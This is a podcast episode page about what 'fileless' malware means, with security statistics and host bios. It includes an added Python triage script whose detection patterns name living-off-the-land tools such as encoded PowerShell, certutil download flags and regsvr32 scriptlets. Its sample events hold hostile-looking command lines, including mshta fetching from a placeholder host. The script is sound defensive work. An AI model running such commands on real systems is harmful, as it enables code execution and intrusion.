InSecurity Podcast: Jeff Tang on Demystifying “Fileless” Malware

“The only difference between a hacker and a remote systems administrator is who is employing them…” ~ Unknown

Care to hear some numbers that might scare you? Alternatively, they might confirm what you already know. Then again, they might just be numbers…

  • 63% of security professionals say the frequency of attacks has gone up over the past twelve months, according to Ponemon's 2018 State of Endpoint Security Risk report
  • 52% of respondents in the same survey said that not all attacks can realistically be stopped, and that their antivirus solutions are blocking only 43% of attacks
  • 62% of respondents said that their organizations had experienced one or more endpoint attacks that resulted in a data breach (6 Ways Malware Can Bypass Endpoint Protection)

By now, most people are familiar with the concept of file-based malware: malware is typically delivered in the form of executable files. When it comes to “fileless” malware, however, there’s a lot of confusion and misunderstanding, because the meaning of the term has kept evolving.

Fileless malware originally took shape in the form of exploit payloads that reside only in memory and never touch the hard drive. Later on, the endpoint security industry broadened the term to encompass file formats that were not traditionally recognized as executable but instead served as a host container for running arbitrary code. As attackers have revamped their techniques, the term has gone on to include the misuse of built-in operating system utilities and living-off-the-land attacks to conduct their operations.
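The three senses of the term above map onto different telemetry. Memory-only payloads never show up in file or process-creation logs at all (they need memory scanning or an EDR sensor), but the other two are visible in ordinary process-creation events: a script host or Office application opening a non-executable "container" file, and a built-in utility launched with arguments that rarely occur in legitimate use. The following is an added example, not code from the podcast or from BlackBerry Cylance; it triages a handful of constructed process-creation events with illustrative heuristics (the utility names, argument patterns and the `timestamp|parent|image|commandline` log format are all assumptions made for the example, not a vendor's detection logic).

```python
"""Triage constructed process-creation events into the two "fileless"
classes that are observable from process telemetry (added example)."""
import re
from dataclasses import dataclass
from typing import Dict, List

# Script hosts and document applications that execute "container" formats
# (file types not traditionally treated as executable) on the attacker's behalf.
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe", "powershell.exe",
                "winword.exe", "excel.exe"}
CONTAINER_EXTENSIONS = (".hta", ".js", ".jse", ".vbs", ".vbe", ".wsf",
                        ".ps1", ".docm", ".xlsm")

# Built-in utilities commonly seen in living-off-the-land activity, each paired
# with argument patterns that are unusual in legitimate bulk use (assumed list).
LOLBIN_PATTERNS: Dict[str, "re.Pattern[str]"] = {
    "powershell.exe": re.compile(r"(?:^|\s)-(?:e|ec|enc|encodedcommand)\b|downloadstring|\biex\b", re.I),
    "mshta.exe": re.compile(r"https?://|javascript:|vbscript:", re.I),
    "regsvr32.exe": re.compile(r"/i:\S*https?://|scrobj\.dll", re.I),
    "rundll32.exe": re.compile(r"javascript:|https?://", re.I),
    "certutil.exe": re.compile(r"-urlcache|-decode", re.I),
    "wmic.exe": re.compile(r"process\s+call\s+create", re.I),
}
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}


@dataclass
class Verdict:
    category: str            # "lolbin", "container_file" or "benign"
    reason: str
    office_parent: bool = False  # script host / LOLBin spawned by an Office app


def parse_event(line: str) -> dict:
    """Parse the constructed 'timestamp|parent|image|commandline' format."""
    ts, parent, image, cmdline = line.split("|", 3)
    return {"ts": ts, "parent": parent.lower(), "image": image, "cmdline": cmdline}


def _basename(path: str) -> str:
    # Split on either separator so Windows paths work on any host OS.
    return re.split(r"[\\/]", path)[-1].lower()


def classify(event: dict) -> Verdict:
    image = _basename(event["image"])
    cmdline = event["cmdline"]
    office = event["parent"] in OFFICE_APPS and (image in SCRIPT_HOSTS or image in LOLBIN_PATTERNS)
    # 1. Built-in utility invoked with arguments typical of LOLBin misuse.
    pattern = LOLBIN_PATTERNS.get(image)
    if pattern:
        m = pattern.search(cmdline)
        if m:
            return Verdict("lolbin", f"{image} with suspicious argument {m.group(0).strip()!r}", office)
    # 2. Non-traditional container format handed to its host interpreter.
    if image in SCRIPT_HOSTS:
        for ext in CONTAINER_EXTENSIONS:
            if re.search(re.escape(ext) + r"\b", cmdline, re.I):
                return Verdict("container_file", f"{image} executing a {ext} file", office)
    # Memory-only payloads are invisible here: nothing in a process-creation
    # event distinguishes them, so "benign" only means "nothing seen in this log".
    return Verdict("benign", "", office)


def triage(lines: List[str]) -> Dict[str, int]:
    """Count verdicts per category; non-benign events are printed as alerts."""
    counts: Dict[str, int] = {"lolbin": 0, "container_file": 0, "benign": 0}
    for line in lines:
        event = parse_event(line)
        verdict = classify(event)
        counts[verdict.category] += 1
        if verdict.category != "benign":
            flag = " [spawned by Office app]" if verdict.office_parent else ""
            print(f"{event['ts']} {verdict.category}: {verdict.reason}{flag}")
    return counts


# Constructed sample events; paths and hosts are fictitious.
SAMPLE_EVENTS = [
    r"2024-01-01T10:00:00Z|explorer.exe|C:\Windows\System32\notepad.exe|notepad.exe notes.txt",
    r"2024-01-01T10:01:00Z|winword.exe|C:\Windows\System32\wscript.exe|wscript.exe C:\Users\a\AppData\Local\Temp\invoice.vbs",
    r"2024-01-01T10:02:00Z|cmd.exe|C:\Windows\System32\mshta.exe|mshta.exe http://example.invalid/page",
    r"2024-01-01T10:03:00Z|explorer.exe|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell.exe -nop -w hidden -enc QQBCAEMA",
    r"2024-01-01T10:04:00Z|services.exe|C:\Windows\System32\svchost.exe|svchost.exe -k netsvcs",
]

if __name__ == "__main__":
    print(triage(SAMPLE_EVENTS))
```

The order of the two checks matters: `mshta.exe` fetching a remote URL is classified as utility misuse, while `mshta.exe` opening a local `.hta` falls through to the container check. The Office-parent flag is kept separate from the category because it is a strong signal in its own right (a document application rarely has a reason to spawn a script host) and is usually what turns a low-priority hit into an alert.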

In this episode of the InSecurity Podcast, Matt Stephenson spends some time with Jeff Tang to find out what the hell all this means and why it matters. Think you know? You might want to tune in just to make sure!

About Jeff Tang

Jeff Tang (@mrjefftang) is a Senior Security Researcher at BlackBerry Cylance focused on operating systems and vulnerability research. He started his career as a Global Network Exploitation & Vulnerability Analyst at the National Security Agency, where he conducted computer network exploitation operations in support of national security requirements.

Prior to BlackBerry Cylance, Jeff served as the Chief Scientist at VAHNA to develop a security platform for identifying targeted network intrusions, and also worked as a CNO Developer at ManTech where he researched tools, techniques and countermeasures in computer network vulnerabilities.

Jeff completed his Bachelor of Science (BSc) in Electrical Engineering and Computer Science at the University of California, Berkeley, and a Master of Science (MSc) in Offensive Computer Security at Eastern Michigan University.

About Matt Stephenson

InSecurity Podcast host Matt Stephenson (@packmatt73) leads the Security Technology team at BlackBerry Cylance, which puts him in front of crowds, cameras, and microphones all over the world. He is the regular host of the InSecurity Podcast and host of CylanceTV.

Twenty years of work with the world’s largest security, storage, and recovery companies has introduced Matt to some of the most fascinating people in the industry. He wants to get those stories told so that others can learn from what has come before.